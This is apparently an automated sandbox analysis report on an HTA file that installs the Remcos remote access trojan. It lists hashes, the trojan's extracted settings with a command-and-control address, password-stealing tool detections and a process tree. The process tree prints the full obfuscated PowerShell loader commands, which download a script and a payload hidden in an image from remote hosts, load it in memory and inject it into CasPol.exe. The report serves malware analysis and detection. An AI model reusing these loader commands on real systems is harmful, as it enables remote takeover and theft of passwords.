Analysis
-
max time kernel
148s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
04-02-2025 14:25
Static task
static1
Behavioral task
behavioral1
Sample
sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta
Resource
win10v2004-20250129-en
General
-
Target
sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta
-
Size
14KB
-
MD5
b6572f3c40c7c1f48cf6d3cf6383e58d
-
SHA1
ef572061a9b3a4bf0a1b1df74357edc4f810c039
-
SHA256
53567cc7f7c6d7d1538b06ce9bc2d61b262c5fe0b491afcbb68b042e4ecb1128
-
SHA512
1df142f5f3e71a93d41452ae666003c173de45395501c75dd9405813ec10600e5f674e5647e6c1b6f7f53b90e5b2687c951c4fecc2e19332bc93a614e3efd8f0
-
SSDEEP
96:fLgCkOWCkoT+aKau28uaDrUgrUCicCkbZ+:0CkVCkoT+aKarp/kCkk
Malware Config
Extracted
remcos
RemoteHost
192.3.243.136:6878
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-JARS2X
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/1252-106-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/3104-110-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/2464-107-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/1252-106-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/2464-107-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 24 2648 powershell.exe 27 5000 powershell.exe 28 5000 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 4640 cmd.exe 2648 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\International\Geo\Nation mshta.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 5000 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 5000 set thread context of 1564 5000 powershell.exe 96 PID 1564 set thread context of 2464 1564 CasPol.exe 97 PID 1564 set thread context of 1252 1564 CasPol.exe 98 PID 1564 set thread context of 3104 1564 CasPol.exe 102 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2648 powershell.exe 2648 powershell.exe 5000 powershell.exe 5000 powershell.exe 2464 CasPol.exe 2464 CasPol.exe 3104 CasPol.exe 3104 CasPol.exe 2464 CasPol.exe 2464 CasPol.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 1564 CasPol.exe 1564 CasPol.exe 1564 CasPol.exe 1564 CasPol.exe 1564 CasPol.exe 1564 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2648 powershell.exe Token: SeDebugPrivilege 5000 powershell.exe Token: SeDebugPrivilege 3104 CasPol.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1564 CasPol.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 5032 wrote to memory of 4640 5032 mshta.exe 85 PID 5032 wrote to memory of 4640 5032 mshta.exe 85 PID 5032 wrote to memory of 4640 5032 mshta.exe 85 PID 4640 wrote to memory of 2648 4640 cmd.exe 87 PID 4640 wrote to memory of 2648 4640 cmd.exe 87 PID 4640 wrote to memory of 2648 4640 cmd.exe 87 PID 2648 wrote to memory of 3804 2648 powershell.exe 90 PID 2648 wrote to memory of 3804 2648 powershell.exe 90 PID 2648 wrote to memory of 3804 2648 powershell.exe 90 PID 3804 wrote to memory of 3308 3804 csc.exe 92 PID 3804 wrote to memory of 3308 3804 csc.exe 92 PID 3804 wrote to memory of 3308 3804 csc.exe 92 PID 2648 wrote to memory of 4888 2648 powershell.exe 93 PID 2648 wrote to memory of 4888 2648 powershell.exe 93 PID 2648 wrote to memory of 4888 2648 powershell.exe 93 PID 4888 wrote to memory of 5000 4888 WScript.exe 94 PID 4888 wrote to memory of 5000 4888 WScript.exe 94 PID 4888 wrote to memory of 5000 4888 WScript.exe 94 PID 5000 wrote to memory of 1564 5000 powershell.exe 96 PID 5000 wrote to memory of 1564 5000 powershell.exe 96 PID 5000 wrote to memory of 1564 5000 powershell.exe 96 PID 5000 wrote to memory of 1564 5000 powershell.exe 96 PID 5000 wrote to memory of 1564 5000 powershell.exe 96 PID 5000 wrote to memory of 1564 5000 powershell.exe 96 PID 5000 wrote to memory of 1564 5000 powershell.exe 96 PID 5000 wrote to memory of 1564 5000 powershell.exe 96 PID 5000 wrote to memory of 1564 5000 powershell.exe 96 PID 5000 wrote to memory of 1564 5000 powershell.exe 96 PID 1564 wrote to memory of 2464 1564 CasPol.exe 97 PID 1564 wrote to memory of 2464 1564 CasPol.exe 97 PID 1564 wrote to memory of 2464 1564 CasPol.exe 97 PID 1564 wrote to memory of 2464 1564 CasPol.exe 97 PID 1564 wrote to memory of 1252 1564 CasPol.exe 98 PID 1564 wrote to memory of 1252 1564 CasPol.exe 98 PID 1564 wrote to memory of 1252 1564 CasPol.exe 98 PID 1564 wrote to memory of 1252 1564 CasPol.exe 98 PID 1564 wrote to memory of 3100 1564 CasPol.exe 99 PID 1564 wrote to memory of 3100 1564 CasPol.exe 99 PID 1564 wrote to memory of 3100 1564 CasPol.exe 99 PID 1564 wrote to memory of 3448 1564 CasPol.exe 100 PID 1564 wrote to memory of 3448 1564 CasPol.exe 100 PID 1564 wrote to memory of 3448 1564 CasPol.exe 100 PID 1564 wrote to memory of 1360 1564 CasPol.exe 101 PID 1564 wrote to memory of 1360 1564 CasPol.exe 101 PID 1564 wrote to memory of 1360 1564 CasPol.exe 101 PID 1564 wrote to memory of 3104 1564 CasPol.exe 102 PID 1564 wrote to memory of 3104 1564 CasPol.exe 102 PID 1564 wrote to memory of 3104 1564 CasPol.exe 102 PID 1564 wrote to memory of 3104 1564 CasPol.exe 102
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sheisbestforbetterforgoodthingstogetbackbetterthingsforgood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c pOWershell.exe -ex bypASS -NOP -w 1 -C DeviCECredEnTiaLdeploYmeNt ; iEX($(IEx('[sYStEM.TEXT.encOdinG]'+[cHar]0x3a+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING('+[ChAr]34+'JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi'+[ChAr]34+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOWershell.exe -ex bypASS -NOP -w 1 -C DeviCECredEnTiaLdeploYmeNt ; iEX($(IEx('[sYStEM.TEXT.encOdinG]'+[cHar]0x3a+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING('+[ChAr]34+'JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi'+[ChAr]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ukbu5rnk\ukbu5rnk.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB44.tmp" "c:\Users\Admin\AppData\Local\Temp\ukbu5rnk\CSC3A6F9598F17B4F4FBA88E23CA42230F1.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:3308
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodgirlalwaysbeagoodgirlwithbetterpersongoogirlwith.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBpAHQAcwBlAGIAeQBtAHIAbwBmAGQAbwBvAGcAcwBzAGUAbgB0AGEAZQByAGcAaAB0AGkAdwBzAGcAbgBpAGgAdAB0AHMAZQBiAGUAaAB0AGUAZQBzAC8AMAAzADQALwAyADcALgA3AC4AOAA2ADEALgA0ADAAMQAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAMwAzADQANQAzADMALwBhAGwAYwBiADQAaAB0AG8AbAB6AHYAZgBoAHoAegB1AGYAcQBoADUALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\arvaogfmtwegsuqtwneffdhushvuoss"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2464
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ktitoyqooewlvbexfyryqqcdawfdhdjazn"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:1252
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\vnodprb"7⤵PID:3100
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\vnodprb"7⤵PID:3448
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\vnodprb"7⤵PID:1360
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\vnodprb"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3104
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
102B
MD52d5a2b9b9578e62cee5253b83755e5d1
SHA18e41edee4443f4788e34995dab8c90c7bdbf2165
SHA2564442df7e3e739ecaab478a74d8860c233c30b55c60bf602e2f1aa3ffa0258946
SHA5120e93e74e58981c3c299c71f1a5afd9c09fbbba7c792b88b0561b9479a6411deb15f3d4eadafde57ecd33e8947adac882ad3bd90a5bf2825a39e780986727e8c6
-
Filesize
2KB
MD59faf6f9cd1992cdebfd8e34b48ea9330
SHA1ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA2560c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA51205b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97
-
Filesize
19KB
MD516d148ee8aaab0b418be74094f81ba47
SHA1db15a72bc4d26927b531b5cd9aaa5612e4c7577b
SHA256b3c68e85d4626670548536d80937bd0ee2909036c463e586d9154f3009c36f22
SHA5128340a3bd6fd72fa37fce517ef650f0a42c4a4aba89430aa8eeefac327bd1f0b0b42fbc8c9fb9a48bfbd29f509c976459a2ae95127c9c5164dfb9006617c43aef
-
Filesize
1KB
MD5a44f48e08623b7d6d6efeb8c173a7774
SHA17b17450d4d7fb45ef2b39f39aed5ddcb9018d129
SHA256f7254041236e0238fef0e38ce84b62f6b24780462ad6d2eb80f61632b102df6d
SHA512696f452ef426ae5cb328eb98a3088f5a893dd03eadf7f746a9c0192f67469d6a4b8428577200105d25c8e06e3ab8029102a6439ec4a7eedd33b9a53105ed8a1e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5f59f92591b8d57a95f1a5beb23a658d7
SHA16d26907d3d1ad1799f6bda6ba2c7db51f0e8d56d
SHA2562a662290f17ef4bd2b908aea8ebcabeef63117955b5be1769425bdefdbad1b22
SHA512b619288957ad69898e325207462e20cfa7bbf9b116ec5237da6fe47fef5450b1e9e040f1c60941b00bad9e9cb31f775c843f4d180f575643d6894f51548aa13b
-
Filesize
3KB
MD59cdb9f32e097030d2470598ccd551a0b
SHA19899c945ff5d55b173fbce932ebe56e2251e1469
SHA25681833befd418d47c29061f58a350bbb6867b9e099b6635dea65197306560b466
SHA512ab23935661c5a6c34cb5a9a3e7dfd4371e0ad8ad14e4948a548ac94f67ef431ceb3dd6ac9aaac2d48528bea03f2d2ff064673c97d4d6f402f6c4b883fe44fc81
-
Filesize
223KB
MD5333ba8d914c321df855e5b74274f38d0
SHA1e5d512a9c1d7c5be82bf4fd4e9b5dea83793ca79
SHA256048099ca7e2e55ad822eb367fcc5b7e5ecf98557651825a03c34ca8373120139
SHA51250699c6433d0d541658d8a419f3a240b49c60b06352fc5f9d61008decf647f03e40a2afcc20c1ba5855ae34eb7c45dec52c4f7ab46d81bafa9e7be83a006fe7f
-
Filesize
652B
MD54dc9ac45a0118e16f0ee2ebdcd7815ca
SHA17eaedda36a00fab651afa5145a3df290a84780d3
SHA256e385832952bf48d2710ac3814804276afffdc885ed30c5cf536656905aca9742
SHA51291c14ddae1c634ca544bd0226bcb063702b2ed5220d5980727fc902548342a70b2c5a314c66a27ab699480eec8bb6d091d0e655cfd1e30bd1ceb34a5ae8228b2
-
Filesize
465B
MD57da95fb8f830258ef72b0f5c7b4d425c
SHA1c625a70e4f81b9e04b7d95479e37c90e9c8f4f71
SHA25659fb5ee2f23beec8c2623d2686a7b52d2eaf786f90869990d525facc2a2da7fa
SHA512039be9d1aabc4e450ab1ffe219425f21e3938fc530899863908c4900545275d5468659fd1cd0665a05d521f81eca17417b8f82e8eea102ddca08c0c82cc05926
-
Filesize
369B
MD57898ed37f867839a3fc5ec6f71377423
SHA1f550c4ccfef10706848d098072ed3718f5db043a
SHA256e8356f36044ca976bb565dddb1c2b54537104da68d6f28989a73f9f92a2eb727
SHA5125cd8396a61d06c8af85ed96da59d7b44e47d561547dbec8b3e183c7222e8e1894e932d01cc7882d17db05eb73da567600b8de02951a5c9417215da222eb93f08